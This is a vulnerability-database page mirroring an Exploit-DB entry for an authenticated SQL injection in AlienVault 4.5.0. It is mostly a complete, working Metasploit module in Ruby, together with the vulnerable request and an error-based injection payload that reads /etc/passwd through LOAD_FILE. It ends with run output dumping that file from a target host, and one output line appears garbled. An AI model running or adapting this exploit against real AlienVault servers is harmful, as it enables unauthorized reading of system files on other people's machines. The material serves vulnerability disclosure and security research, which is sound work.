Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Alienvault 4.5.0 - (Authenticated) SQL Injection (Metasploit)

🗓️ 01 Apr 2014 00:00:00Reported by Brandon PerryType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 23 Views

AlienVault 4.5.0 vulnerable to authenticated SQL injection attack via PNG generation PHP file. Exploited to read arbitrary file from system

Code
The following request is vulnerable to a SQL injection attack from authenticated users.
 
GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1
Host: 172.31.16.150
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==
Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;
Connection: keep-alive
 
 
------------------------------------------------------------------------------------------------
 
The following metasploit module will exploit this in order to read a file off of the file system:
 
 
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
 
require 'msf/core'
 
class Metasploit4 < Msf::Auxiliary
 
include Msf::Exploit::Remote::HttpClient
 
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault 4.5.0 authenticated SQL injection arbitrary file read",
'Description' => %q{
AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
generation PHP file. This module exploits this to read an arbitrary file from
the file system. Any authed user should be usable. Admin not required.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
],
'References' =>
[
],
'Platform' => ['linux'],
'Privileged' => false,
'DisclosureDate' => "Mar 30 2014"))
 
register_options(
[
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']),
OptString.new('USERNAME', [ true, 'Single username', 'username']),
OptString.new('PASSWORD', [ true, 'Single password', 'password']),
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/'])
], self.class)
 
end
 
def run
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
})
 
cookie = res.get_cookies
 
post = {
'embed' => '',
'bookmark_string' => '',
'user' => datastore['USERNAME'],
'passu' => datastore['PASSWORD'],
'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
}
 
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie
})
 
if res.headers['Location'] != '/ossim/'
fail_with('Authentication failed')
end
 
cookie = res.get_cookies
 
done = false
i = 0
full = ''
 
while !done
pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x7175777471,"
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x2f6574632f706173737764)) AS CHAR),"
pay << "0x20)),#{(50*i)+1},50)),0x7169716d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << " GROUP BY x)a) AND 'xnDa'='xnDa"
 
get = {
'date_from' => pay,
'date_to' => '2014-03-30'
}
 
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'),
'cookie' => cookie,
'vars_get' => get
})
 
file = /quwtq(.*)qiqmq/.match(res.body)
 
file = file[1]
 
if file == ''
done = true
end
 
str = [file].pack("H*")
full << str
vprint_status(str)
 
i = i+1
 
end
 
path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
print_good("File stored at path: " + path)
end
end
 
-----------------------------------------------------------------------------
 
Quick run of the module:
 
msf auxiliary(alienvault_isp27001_sqli) > show options
 
Module options (auxiliary/gather/alienvault_isp27001_sqli):
 
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPATH /etc/passwd yes Path to remote file
PASSWORD password yes Single password
Proxies no Use a proxy chain
RHOST 172.31.16.150 yes The target address
RPORT 443 yes The target port
TARGETURI / yes Relative URI of installation
USERNAME username yes Single username
VHOST no HTTP server virtual host
 
msf auxiliary(alienvault_isp27001_sqli) > run
 
[+] File stored at path: /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt
[*] Auxiliary module execution completed
80922_default_172.31.16.150_alienvault.file_049766.txterry/.msf4/loot/201403300
[*] exec: cat /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt
 
root:x:0:0:root:/root:/usr/bin/llshell
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
munin:x:102:104::/var/lib/munin:/bin/false
postfix:x:103:106::/var/spool/postfix:/bin/false
snmp:x:104:108::/var/lib/snmp:/bin/false
hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
ossec:x:1000:1000::/var/ossec/:/bin/false
ossecm:x:1001:1000::/var/ossec/:/bin/false
ossecr:x:1002:1000::/var/ossec/:/bin/false
ntop:x:106:111::/var/lib/ntop:/bin/false
snort:x:107:112:Snort IDS:/var/log/snort:/bin/false
prads:x:108:113::/home/prads:/bin/false
nagios:x:109:114::/var/lib/nagios:/bin/false
mysql:x:110:115:MySQL Server,,,:/var/lib/mysql:/bin/false
asec:x:111:116:Alienvault smart event system user,,,:/var/lib/asec:/bin/false
mongodb:x:112:65534::/home/mongodb:/bin/false
avserver:x:113:121:AlienVault SIEM,,,:/home/avserver:/bin/false
avidm:x:114:121:AlienVault IDM,,,:/home/avidm:/bin/false
stunnel4:x:115:122::/var/run/stunnel4:/bin/false
avagent:x:116:121:AlienVault Agent,,,:/home/avagent:/bin/false
avapi:x:117:121:AlienVault SIEM,,,:/home/avapi:/bin/bash
rabbitmq:x:118:123:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false
avforw:x:119:121:AlienVault SIEM,,,:/home/avforw:/bin/false
msf auxiliary(alienvault_isp27001_sqli) >

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Apr 2014 00:00Current
7.4High risk
Vulners AI Score7.4
alienvault vulnerabilityauthenticated sql injectionpng generationsystem file read
23